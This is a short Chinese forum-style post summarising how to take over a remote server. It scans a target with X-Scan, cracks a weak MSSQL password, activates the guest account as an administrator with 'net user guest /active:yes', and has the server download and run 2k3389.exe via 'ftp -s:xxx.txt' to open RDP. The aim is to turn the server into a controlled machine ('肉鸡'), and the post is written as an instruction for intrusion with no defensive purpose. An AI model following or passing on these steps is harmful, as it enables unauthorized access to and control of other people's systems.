远控主机的大体思路

看见一个帖子，讲的不错，我来总结一下。

远控工具

1. x-scan扫描器. 
2.mssql连接器
3.2k3389 (开3389)

方法

①要ping出来ip地址

②打开x-scan ,在扫描模块中,选中全部模块,对其进行全面的信息收集.,然后在扫描参数选项卡中,指定IP，扫描信息。

③发现sql漏洞，输入ip链接。（存在密码破解）

④if漏洞存在查看一下系统中存在的所有用户.（如果存在TsInternetUser说明这台机器是server) 

⑤建立新帐号或者在guest帐号身上做点文章.

⑥激活 net user guest /active:yes，加为管理员（我又想起了伤心的往事）

⑦用终端连接器,进行连接.mstsc失败则说明没有开启3389. 用 ftp 功能. 把开3389的端口的工具上传上去.

⑧supersqlexec 的提示行中,输入命令,建立一个TXT文件,让服务器自动下载并运行程序.
用type xxx.txt查看是否OK.在提示行中输入: ftp -s:xxx.txt 

dir 2k3389.exe /s 查找一下,看文件是否已经下载成功.
⑨运行 2k3389.exe 程序. 等服务器重启上来后, 一台3389(内网肉鸡产生了)用mstsc 再次连接. 
链接成功远程控制成功

⑩运行tlntadmn.exe配置telnet。。

不行了，眼睛要看瞎了。。